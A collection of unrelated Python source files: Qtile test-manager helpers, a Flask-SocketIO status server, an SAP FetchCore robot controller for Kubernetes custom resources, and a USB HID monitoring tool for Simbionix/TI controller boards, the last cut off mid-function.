def create_manager(self, config_class):
"""Create a Qtile manager instance in this thread
This should only be used when it is known that the manager will throw
an error and the returned manager should not be started, otherwise this
will likely block the thread.
"""
init_log(self.log_level)
kore = self.backend.create()
config = config_class()
for attr in dir(default_config):
if not hasattr(config, attr):
setattr(config, attr, getattr(default_config, attr))
return Qtile(kore, config, socket_path=self.sockfile)
def terminate(self):
if self.proc is None:
print("qtile is not alive", file=sys.stderr)
else:
# try to send SIGTERM and wait up to 10 sec to quit
self.proc.terminate()
self.proc.join(10)
if self.proc.is_alive():
print("Killing qtile forcefully", file=sys.stderr)
# desperate times... this probably messes with multiprocessing...
try:
os.kill(self.proc.pid, 9)
self.proc.join()
except OSError:
# The process may have died due to some other error
pass
if self.proc.exitcode:
print("qtile exited with exitcode: %d" % self.proc.exitcode, file=sys.stderr)
self.proc = None
for proc in self.testwindows[:]:
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
def create_window(self, create, failed=None):
"""
Uses the function `create` to create a window.
Waits until qtile actually maps the window and then returns.
"""
client = self.c
start = len(client.windows())
create()
@Retry(ignore_exceptions=(RuntimeError,), fail_msg="Window never appeared...")
def success():
while failed is None or not failed():
if len(client.windows()) > start:
return True
raise RuntimeError("not here yet")
return success()
def _spawn_window(self, *args):
"""Starts a program which opens a window
Spawns a new subprocess for a command that opens a window, given by the
arguments to this method. Spawns the new process and checks that qtile
maps the new window.
"""
if not args:
raise AssertionError("Trying to run nothing! (missing arguments)")
proc = None
def spawn():
nonlocal proc
# Ensure the client only uses the test display
env = os.environ.copy()
env.pop("DISPLAY", None)
env.pop("WAYLAND_DISPLAY", None)
env.update(self.backend.env)
proc = subprocess.Popen(args, env=env)
def failed():
if proc.poll() is not None:
return True
return False
self.create_window(spawn, failed=failed)
self.testwindows.append(proc)
return proc
def kill_window(self, proc):
"""Kill a window and check that qtile unmaps it
Kills a window created by calling one of the `self.test*` methods,
ensuring that qtile removes it from the `windows` attribute.
"""
assert proc in self.testwindows, "Given process is not a spawned window"
start = len(self.c.windows())
proc.terminate()
proc.wait()
self.testwindows.remove(proc)
@Retry(ignore_exceptions=(ValueError,))
def success():
if len(self.c.windows()) < start:
return True
raise ValueError("window is still in client list!")
if not success():
raise AssertionError("Window could not be killed...")
def test_window(self, name, floating=False, wm_type="normal", export_sni=False):
"""
Create a simple window in X or Wayland. If `floating` is True then the wmclass
is set to "dialog", which triggers auto-floating based on `default_float_rules`.
`wm_type` can be changed from "normal" to "notification", which creates a window
that not only floats but does not grab focus.
Setting `export_sni` to True will publish a simplified StatusNotifierItem interface
on DBus.
Windows created with this method must have their process killed explicitly, no
matter what type they are.
"""
python = sys.executable
path = Path(__file__).parent / "scripts" / "window.py"
wmclass = "dialog" if floating else "TestWindow"
args = [python, path, "--name", wmclass, name, wm_type]
if export_sni:
args.append("export_sni_interface")
return self._spawn_window(*args)
def test_notification(self, name="notification"):
return self.test_window(name, wm_type="notification")
def groupconsistency(self):
groups = self.c.groups()
screens = self.c.screens()
seen = set()
for g in groups.values():
scrn = g["screen"]
if scrn is not None:
if scrn in seen:
raise AssertionError("Screen referenced from more than one group.")
seen.add(scrn)
assert screens[scrn]["group"] == g["name"]
assert len(seen) == len(screens), "Not all screens had an attached group."
@Retry(ignore_exceptions=(AssertionError,), fail_msg="Window did not die!")
def assert_window_died(client, window_info):
client.sync()
wid = window_info["id"]
assert wid not in set([x["id"] for x in client.windows()])
|
server.py
|
#!/usr/bin/python3
import os
import time
import queue
import eventlet
import threading
from flask import Flask, render_template, request, send_from_directory, Response, send_file
from flask_socketio import SocketIO
statusQueue = eventlet.Queue()
app = Flask(__name__, static_url_path="")
socketio = SocketIO(app, engineio_logger=True, async_mode='threading')
#socketio = SocketIO(app, engineio_logger=True, async_mode="eventlet")
def ack():
print("< Message sent was received!")
#
def emitStatus():
print("Beginning to emit ...")
while True:
msg = statusQueue.get()
print("> Sending status packet: " + str(msg))
socketio.emit("clientstatus", msg, callback=ack, broadcast=True)
statusQueue.task_done()
print("> Sending status packet done.")
print("Terminated.")
#
socketio.start_background_task(emitStatus)
def threadRunnable():
stateID = 0
while True:
msg = {
"stateID": stateID,
}
print(">", end="", flush=True)
#print("Adding status packet to queue: " + str(msg))
statusQueue.put(msg)
time.sleep(2)
stateID += 1
#
thread = threading.Thread(target = threadRunnable)
thread.start()
@app.route("/<path>", methods=["GET", "POST"])
def sendData1(path):
# print(path)
return send_from_directory('wwwroot', path)
#
@app.route("/", methods=["GET", "POST"])
def sendIndex():
return send_file("wwwroot/index.html", mimetype="text/html")
#
@socketio.on("myws")
def handle_myEvent(message):
print("< Message received: " + str(message))
#
if __name__ == '__main__':
socketio.run(app, host='0.0.0.0', port=3000)
|
robot.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""FetchCore robot controller."""
import logging
import datetime
import sys
import threading
import traceback
from copy import deepcopy
from typing import Dict
from kubernetes.client.rest import ApiException
from k8scrhandler.k8scrhandler import K8sCRHandler
from .fetchrobot import FetchRobots
from .helper import get_sample_cr, MainLoopController
_LOGGER = logging.getLogger(__name__)
class RobotController(K8sCRHandler):
"""FetchCore robot controller."""
def __init__(self, fetch_robots: FetchRobots) -> None:
"""Construct."""
# Instance with all FetchCore robots
self._fetch_robots = fetch_robots
self.robottypes: Dict[str, bool] = {}
# Super constructor for robot CR
self.robot_template_cr = get_sample_cr('robco_robot')
super().__init__(
'registry.cloudrobotics.com',
'v1alpha1',
'robots',
'default',
self.robot_template_cr,
{}
)
# Create instance for robottypes CR
template_robottype_cr = get_sample_cr('robco_robottype')
self.robottype_controller = K8sCRHandler(
'registry.cloudrobotics.com',
'v1alpha1',
'robottypes',
'default',
template_robottype_cr,
{}
)
# Init threads
self.robot_status_update_thread = threading.Thread(target=self._update_robot_status_loop)
# register callbacks
self.robottype_controller.register_callback(
'robot', ['ADDED', 'MODIFIED', 'REPROCESS'], self.robottype_cb)
self.register_callback(
'robot', ['ADDED', 'REPROCESS'], self.robot_cb)
self.register_callback(
'robot_deleted', ['DELETED'], self.robot_deleted_cb)
def robot_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Fetch robot is not in FetchCore watch list, add it
try:
self._fetch_robots.get_robot(name)
except ValueError:
self._fetch_robots.add_robot(name)
_LOGGER.info('Added robot %s to FetchCore watch list', name)
def robot_deleted_cb(self, name: str, custom_res: Dict) -> None:
"""Process robot delete CR callback data."""
# Check if robot is a Fetch robot
robottype = custom_res.get('spec', {}).get('type')
is_fetch = self.robottypes.get(robottype, False)
if is_fetch:
# Remove robot from FetchCore watch list
self._fetch_robots.remove_robot(name)
_LOGGER.info('Removed robot %s from FetchCore watch list', name)
def robottype_cb(self, name: str, custom_res: Dict) -> None:
"""Process robottype CR callback data."""
self.robottypes[name] = bool(custom_res.get('spec', {}).get('make') == 'fetch')
def run(self, watcher: bool = True, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
# Initial load of robot types
robot_type_crs = self.robottype_controller.list_all_cr()
if robot_type_crs:
for custom_res in robot_type_crs['items']:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robottype_cb(name, custom_res)
# Initial load of robots
robot_crs = self.list_all_cr()
if robot_crs:
for custom_res in robot_crs['items']:
name = custom_res.get('metadata', {}).get('name')
spec = custom_res.get('spec')
if name and spec:
self.robot_cb(name, custom_res)
# Initial load from FetchCore
self._fetch_robots.update()
# Start watcher threads
self.robottype_controller.run(watcher, reprocess, multiple_executor_threads)
super().run(watcher, reprocess, multiple_executor_threads)
# Start update thread
self.robot_status_update_thread.start()
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
# Stop robottype and robot watchers
self.robottype_controller.stop_watcher()
super().stop_watcher()
def _update_robot_status_loop(self) -> None:
"""Run update robot status continiously."""
loop_control = MainLoopController()
_LOGGER.info('Watch robot status loop started')
while self.thread_run:
try:
self.update_robot_status()
loop_control.sleep(2)
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
_LOGGER.error(
'%s/%s: Error watching robot status - Exception: "%s" / "%s" - '
'TRACEBACK: %s', self.group, self.plural, exc_info[0], exc_info[1],
traceback.format_exception(*exc_info))
# On uncovered exception in thread save the exception
self.thread_exceptions['status_loop'] = exc
# Stop the watcher
self.stop_watcher()
_LOGGER.info('Watch robot status loop stopped')
def update_robot_status(self) -> None:
"""Continously update status of robot CR."""
status = deepcopy(self.robot_template_cr)['status']
# Get updated robot states from FetchCore
self._fetch_robots.update()
# Update robot CR status
for name, robot in self._fetch_robots.robots.items():
status['configuration']['trolleyAttached'] = robot.trolley_attached
status['robot']['batteryPercentage'] = robot.battery_percentage
status['robot']['lastStateChangeTime'] = robot.last_state_change
status['robot']['state'] = robot.state
status['robot']['updateTime'] = datetime.datetime.utcnow().replace(
tzinfo=datetime.timezone.utc).isoformat()
try:
self.update_cr_status(name, status)
except ApiException:
_LOGGER.error('Status CR of robot %s could not be updated', name)
|
bsl2.py
|
#!/usr/bin/python3
# C:\Work\Python\HID_Util\src\HID_recorder.py
from binascii import hexlify
import sys
import argparse
import threading
from time import perf_counter as timer
# import include_dll_path
import hid
# import os
# BOARD_TYPE_MAIN = 0,
# BOARD_TYPE_JOYSTICKS = 1,
# BOARD_TYPE_TOOLS_MASTER = 2,
# BOARD_TYPE_STATION = 3,
# BOARD_TYPE_SUITE2PRIPH = 4,
# BOARD_TYPE_TOOLS_SLAVE = 5,
# BOARD_TYPE_GBU = 6,
# BOARD_TYPE_LAP = 7
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller
PRODUCT_ID_CTAG = 0x1005 # Simbionix MSP430 Controller
# USB\VID_2047&PID_0302&REV_0200
VENDOR_ID = 0x2047 # Texas Instruments
PRODUCT_ID = 0x0302 # Joystick.
PRODUCT_ID_JOYSTICK = 0x0302 # Joystick.
PRODUCT_ID_ROUTER = 0x0301 # Router
PRODUCT_ID_STATION = 0x0304
PRODUCT_ID_LAP_NEW_CAMERA = 0x2005
# 2021_01_24
# USB\VID_24B3&PID_2005&REV_0200
# 0x24B3 = 9395
# 0x2005 = 8197
# VENDOR_ID = 0x24b3 # Simbionix
# PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA.
PRODUCT_ID_types = {
0x0302: "BOARD_TYPE: Joystick/Universal",
0x0301: "BOARD_TYPE: Router/Main",
0x0304: "BOARD_TYPE: STATION",
0x0303: "BOARD_TYPE: TOOLS_MASTER",
0x0305: "BOARD_TYPE: SUITE2PRIPH",
0x0306: "BOARD_TYPE: TOOLS_SLAVE",
0x0307: "BOARD_TYPE: GBU",
0x0308: "BOARD_TYPE: LAP camera",
0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h)
0x1965: "yosi"
}
FILE1_PATH = "log\hid_log.csv"
# if not os.path.exists('log'):
# os.makedirs('log')
# file1 = None
# open recording log file:
# file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w")
# file1 = open(FILE1_PATH,"w")
# file1 = open("log\hid_log.csv","w")
hid_util_fault = 0
print_every = 0
READ_SIZE = 64 # The size of the packet
READ_TIMEOUT = 2 # 2ms
WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
DEFAULT_WRITE_DATA = WRITE_DATA
WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command:
# 3f 04 82 00 00
WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# start streaming command for station 0x303:
WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# Get Board Type command:
# 01h 00h 00h 01h
WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#.........................................................##........................................
WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# 'A' - keep Alive + fast BLE update (every 20 msec)
WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# moderate BLE update rate every 50 mSec by 'M' command
WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
# set_BSL_mode
# WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
#0xAA Run BSL
WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds
PRINT_TIME = 1.0 # Print every 1 second
# PRINT_TIME = 0.5 # Print every 0.5 second
#PRINT_TIME = 2 # Print every 2 second
START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes)
# ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,]
ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2))
print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST)
# ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22]
LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2))
COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes)
CMOS_INDEX = 2 + 2 # maybe + 4???
# 0 1 2 3 4 5 6 7 8 9 1011
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
INSERTION_INDEX = 2 + 8
TORQUE_INDEX = 2 + 4
HID_STREAM_CHANNEL1_STYLE = "HIDStreamChannel1"
HID_STREAM_CHANNEL2_STYLE = "HIDStreamChannel2"
INNER_HANDLE_CHANNEL1_STYLE = "InnerHandleChannel1"
INNER_HANDLE_CHANNEL2_STYLE = "InnerHandleChannel2"
CLICKER_STYLE = "Clicker"
SLEEPTIMER_STYLE = "sleepTimer"
BATTERY_LEVEL_STYLE = "batteryLevel"
MOTOR_CURRENT_STYLE = "motorCurrent"
style_names = [
HID_STREAM_CHANNEL1_STYLE,
HID_STREAM_CHANNEL2_STYLE,
INNER_HANDLE_CHANNEL1_STYLE,
INNER_HANDLE_CHANNEL2_STYLE,
CLICKER_STYLE,
SLEEPTIMER_STYLE,
BATTERY_LEVEL_STYLE,
MOTOR_CURRENT_STYLE
]
# global variables
progressbar_styles = list()
progressbars = list()
inner_clicker = list()
red_handle = list()
reset_check = list()
counter_entry = list()
clicker_counter_entry = list()
fault_entry = list()
special_cmd = 0
ignore_red_handle_button = None
ignore_red_handle_checkbutton = None
ignore_red_handle_state = False
root = None
def update_checkbox(checkbox, bool_value):
if (bool_value):
checkbox.select()
else:
checkbox.deselect()
def streaming_button_CallBack():
global special_cmd
global ignore_red_handle_state
special_cmd = 'I'
ignore_red_handle_state = True
def board_type_button_callback():
global special_cmd
special_cmd = 'S'
def alive_button_CallBack():
global special_cmd
special_cmd = 'A'
def moderate_button_CallBack():
global special_cmd
special_cmd = 'M'
def BSL_mode_button_CallBack():
global special_cmd
special_cmd = 'B'
def gui_loop(device):
do_print = True
print_time = 0.0
time = timer()
handle_time = timer()
write_time_capture = timer()
skip_write = 0
prev_counter = 0
send_stream_request_command_once = 1
# cnt = None
# prev_cnt = None
# value = None
global special_cmd
global WRITE_DATA
# global print_flag
while True:
# Reset the counter
if (do_print):
print_time = timer()
# Write to the device
# if send_stream_request_command_once == 1:
# send_stream_request_command_once = 0
# if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA:
# print("enforce streaming of data with command 0x82"
# if device is attached enforce streaming of data.
# device.write(WRITE_DATA_CMD_START)
if special_cmd == 'I':
if PRODUCT_ID == PRODUCT_ID_STATION:
WRITE_DATA = WRITE_DATA_CMD_START_0x304
else:
WRITE_DATA = WRITE_DATA_CMD_START
device.write(WRITE_DATA)
print("special_cmd Start")
special_cmd = 0
# elif special_cmd == 'S':
# WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE
# device.write(WRITE_DATA)
# print("special_cmd CMD_GET_BOARD_TYPE")
# # print_flag = 1
# special_cmd = 0
# elif special_cmd == 'A':
# WRITE_DATA = WRITE_DATA_CMD_A
# print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)")
# special_cmd = 0
# elif special_cmd == 'M':
# WRITE_DATA = WRITE_DATA_CMD_M
# print("special_cmd M -> moderate BLE update rate every 50 mSec")
# special_cmd = 0
elif special_cmd == 'B':
WRITE_DATA = WRITE_DATA_CMD_B
device.write(WRITE_DATA)
print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI")
special_cmd = 0
# else:
# WRITE_DATA = DEFAULT_WRITE_DATA
# # device.write(WRITE_DATA)
if WRITE_DATA == WRITE_DATA_CMD_B:
break
cycle_time = timer() - time
# print("cycle timer: %.10f" % cycle_time)
# If not enough time has passed, sleep for SLEEP_AMOUNT seconds
sleep_time = SLEEP_AMOUNT - (cycle_time)
# if (timer() - time) < SLEEP_AMOUNT:
# if value:
# prev_cnt = cnt
# cnt = value[COUNTER_INDEX]
# if prev_cnt and cnt < prev_cnt:
# print("Invalid counter")
# sleep(SLEEP_AMOUNT)
# Measure the time
time = timer()
# print(" ")
# Read the packet from the device
value = device.read(READ_SIZE, timeout=READ_TIMEOUT)
# Update the GUI
if len(value) >= READ_SIZE:
# save into file:
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST]
channel_0 = analog[0]
channel_1 = analog[1]
channel_2 = analog[2]
channel_3 = analog[3]
channel_4 = analog[4]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
count_dif = counter - prev_counter
# global file1
#if count_dif > 1 :
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ]
#else:
# L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ]
L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ]
# file1.writelines(L)
# handler(value, do_print=do_print)
# print("Received data: %s" % hexlify(value))
Handler_Called = (timer() - handle_time)
if Handler_Called > 0.002 :
# if Handler_Called > 0.02 :
#print("handler called: %.6f" % Handler_Called)
global print_every
print_every = print_every + 1
if print_every >= 500:
print_every = 0
print("time:", time, end="")
print(" Received data: %s" % hexlify(value))
# print("time: %.6f" % time)
handle_time = timer()
prev_counter = counter
# Update the do_print flag
do_print = (timer() - print_time) >= PRINT_TIME
def handler(value, do_print=False):
if do_print:
print("Received data: %s" % hexlify(value))
return # do without gui
# if print_flag:
# print("command response: %s" % hexlify(value))
# print_flag = 0
# tool_size from CMOS: bytes 5..6
# 3f260000370b
global hid_util_fault
hid_util_fault = (int(value[START_INDEX+1]) & 0xF )
digital = (int(value[START_INDEX + 1]) << 8) + int(value[START_INDEX + 0])
analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in ANALOG_INDEX_LIST]
counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX])
tool_size = (int(value[CMOS_INDEX + 1]) << 8) + int(value[CMOS_INDEX])
# Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010'
# TORQUE INSERTION
# 0674 fc41
# -62847372 = FC41 0674
# torque from Avago: bytes 6..9
torque = (int(value[TORQUE_INDEX + 2]) << 24) + (int(value[TORQUE_INDEX+3]) <<16) + (int(value[TORQUE_INDEX]) <<8) + int(value[TORQUE_INDEX+1])
insertion = (int(value[INSERTION_INDEX + 2]) << 24) + (int(value[INSERTION_INDEX+3]) <<16) + (int(value[INSERTION_INDEX]) <<8) + int(value[INSERTION_INDEX+1])
if torque > 2**31:
torque = torque - 2**32
if do_print:
print("Received data: %s" % hexlify(value))
# print("tool_size : %d" % tool_size)
# print("insertion : %d" % insertion , end="")
# print(" torque : %d" % torque)
clicker_counter = (int(value[COUNTER_INDEX+2 + 1]) << 8) + int(value[COUNTER_INDEX+2])
sleepTimer = (int(value[COUNTER_INDEX+4 + 1]) << 8) + int(value[COUNTER_INDEX+4])
encoder1 = analog[3]
encoder2 = analog[0]
encoder3 = analog[1]
encoder4 = analog[2]
MotorCur = analog[4]
clicker_analog = analog[5]
# ClickerRec = analog[6]
# batteryLevel = analog[6]
# ClickerRec is actually connected to Pin of the VREF+ that is on that input P5.0
batteryLevel = analog[7]
# file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w")
# global file1
L = [ str(clicker_analog), "," ,"\n" ]
# file1.writelines(L)
bool_clicker = bool((digital >> 2) & 0x0001)
bool_reset = bool((digital >> 4) & 0x0001)
bool_red_handle = bool((digital >> 7) & 0x0001)
bool_ignore_red_handle = ignore_red_handle_state
if PRODUCT_ID != PRODUCT_ID_STATION:
int_hid_stream_channel1 = analog[1]
int_inner_handle_channel1 = analog[0]
else:
int_hid_stream_channel1 = insertion
int_inner_handle_channel1 = torque
int_hid_stream_channel2 = tool_size
int_inner_handle_channel2 = analog[3]
int_clicker = clicker_analog
int_sleepTimer = sleepTimer
int_batteryLevel = batteryLevel
int_MotorCur = MotorCur
int_counter = counter
int_hid_util_fault = hid_util_fault
int_clicker_counter = clicker_counter
int_hid_stream_insertion = insertion
if PRODUCT_ID != PRODUCT_ID_STATION:
precentage_hid_stream_channel1 = int((int_hid_stream_channel1 / 4096) * 100)
precentage_inner_handle_channel1 = int((int_inner_handle_channel1 / 4096) * 100)
else:
precentage_hid_stream_channel1 = abs(int((int_hid_stream_channel1 / 1000) * 100))
precentage_inner_handle_channel1 = abs(int((int_inner_handle_channel1 / 1000) * 100))
precentage_hid_stream_channel2 = int((int_hid_stream_channel2 / 4096) * 100)
precentage_inner_handle_channel2 = int((int_inner_handle_channel2 / 4096) * 100)
precentage_clicker = int((int_clicker / 4096) * 100)
# precentage_sleepTimer = int((int_sleepTimer / 600) * 100)
precentage_sleepTimer = int(int_sleepTimer )
precentage_batteryLevel = int((int_batteryLevel / 4096) * 100)
precentage_MotorCur = int((int_MotorCur / 4096) * 100)
progressbar_style_hid_stream_channel1 = progressbar_styles[0]
progressbar_style_hid_stream_channel2 = progressbar_styles[1]
progressbar_style_inner_handle_channel1 = progressbar_styles[2]
progressbar_style_inner_handle_channel2 = progressbar_styles[3]
progressbar_style_clicker = progressbar_styles[4]
progressbar_style_sleepTimer = progressbar_styles[5]
progressbar_style_batteryLevel = progressbar_styles[6]
progressbar_style_MotorCur = progressbar_styles[7]
progressbar_hid_stream_channel1 = progressbars[0]
progressbar_hid_insertion = progressbars[0] #can I duplicate it?
progressbar_hid_stream_channel2 = progressbars[1]
progressbar_inner_handle_channel1 = progressbars[2]
progressbar_inner_handle_channel2 = progressbars[3]
progressbar_clicker = progressbars[4]
progressbar_sleepTimer = progressbars[5]
progressbar_batteryLevel = progressbars[6]
progressbar_MotorCur = progressbars[7]
checkbox_inner_clicker = inner_clicker
checkbox_red_handle = red_handle
checkbox_reset_check = reset_check
checkbox_ignore_red_handle = ignore_red_handle_checkbutton
entry_counter = counter_entry
entry_clicker_counter = clicker_counter_entry
entry_fault = fault_entry
progressbar_style_hid_stream_channel1.configure(
HID_STREAM_CHANNEL1_STYLE,
text=("%d" % int_hid_stream_channel1)
)
progressbar_style_hid_stream_channel2.configure(
HID_STREAM_CHANNEL2_STYLE,
text=("%d" % int_hid_stream_channel2)
)
progressbar_style_inner_handle_channel1.configure(
INNER_HANDLE_CHANNEL1_STYLE,
text=("%d" % int_inner_handle_channel1)
)
progressbar_style_inner_handle_channel2.configure(
INNER_HANDLE_CHANNEL2_STYLE,
text=("%d" % int_inner_handle_channel2)
)
progressbar_style_clicker.configure(
CLICKER_STYLE,
text=("%d" % int_clicker)
)
progressbar_style_sleepTimer.configure(
SLEEPTIMER_STYLE,
text=("%d" % sleepTimer)
)
progressbar_style_batteryLevel.configure(
BATTERY_LEVEL_STYLE,
text=("%d" % batteryLevel)
)
progressbar_style_MotorCur.configure(
MOTOR_CURRENT_STYLE,
text=("%d" % MotorCur)
)
# if ( batteryLevel <= 2310 ):
if ( batteryLevel <= 2288 ): # about 2.8 volt
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE,foreground="white", background="#d92929")
else:
progressbar_style_batteryLevel.configure(BATTERY_LEVEL_STYLE, foreground="white", background="blue")
progressbar_hid_stream_channel1["value"] = precentage_hid_stream_channel1
progressbar_hid_stream_channel2["value"] = precentage_hid_stream_channel2
progressbar_inner_handle_channel1["value"] = precentage_inner_handle_channel1
progressbar_inner_handle_channel2["value"] = precentage_inner_handle_channel2
progressbar_clicker["value"] = precentage_clicker
progressbar_sleepTimer["value"] = precentage_sleepTimer
progressbar_sleepTimer["maximum"] = 600
progressbar_batteryLevel["value"] = precentage_batteryLevel
progressbar_MotorCur["value"] = precentage_MotorCur
update_checkbox(checkbox_inner_clicker, bool_clicker)
update_checkbox(checkbox_red_handle, bool_red_handle)
update_checkbox(checkbox_reset_check, bool_reset)
update_checkbox(checkbox_ignore_red_handle, bool_ignore_red_handle)
entry_counter.delete(0, tk.END)
entry_counter.insert(tk.END, "%d" % int_counter)
entry_clicker_counter.delete(0, tk.END)
entry_clicker_counter.insert(tk.END, "%d" % int_clicker_counter)
entry_fault.delete(0, tk.END)
entry_fault.insert(tk.END, "%d" % int_hid_util_fault)
root.update()
PROGRESS_BAR_LEN = 300
LONG_PROGRESS_BAR_LEN = 590
def my_channel_row(frame, row, label, style):
ttk.Label(frame,text=label).grid(row=row,sticky=tk.W)
row += 1
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
ttk.Label(frame,text="Channel 1").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
else:
ttk.Label(frame,text="Torque").grid(row=row,column=0)
ttk.Label(frame,text="Channel 2").grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel1"%style))
progressbars.append(w)
w.grid(row=row,column=0)
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("%sChannel2"%style))
progressbars.append(w)
w.grid(row=row,column=1)
return row + 1
def my_seperator(frame, row):
ttk.Separator(
frame,
orient=tk.HORIZONTAL
).grid(
pady=10,
row=row,
columnspan=3,
sticky=(tk.W + tk.E)
)
return row + 1
def my_widgets(frame):
# Add style for labeled progress bar
for name in style_names:
style = ttk.Style(
frame
)
progressbar_styles.append(style)
style.layout(
name,
[
(
"%s.trough" % name,
{
"children":
[
(
"%s.pbar" % name,
{"side": "left", "sticky": "ns"}
),
(
"%s.label" % name,
{"sticky": ""}
)
],
"sticky": "nswe"
}
)
]
)
if name == SLEEPTIMER_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d9d9d9")
elif name == BATTERY_LEVEL_STYLE:
# style.configure(name, foreground="white", background="blue")
style.configure(name, foreground="white", background="#d92929")
else:
# style.configure(name, background="lime")
style.configure(name, background="#06B025")
# print(style)
row = 0
# Outer Handle
ttk.Label(frame,text="HID Streaming Values").grid(row=row,sticky=tk.W)
row += 1
text_name = "Channel 1"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Insertion"
ttk.Label(frame,text=text_name).grid(row=row,column=0)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel1"))
progressbars.append(w)
w.grid(row=row,column=0)
row -= 1 # go line back for text header
text_name = "Channel 2"
if PRODUCT_ID == PRODUCT_ID_STATION:
text_name = "Tool Size"
ttk.Label(frame,text=text_name).grid(row=row,column=1)
row += 1
w = ttk.Progressbar(frame,orient=tk.HORIZONTAL,length=PROGRESS_BAR_LEN,style=("HIDStreamChannel2"))
progressbars.append(w)
w.grid(row=row,column=1)
row += 1
# Seperator
row = my_seperator(frame, row)
if PRODUCT_ID != PRODUCT_ID_STATION:
# Inner Handle
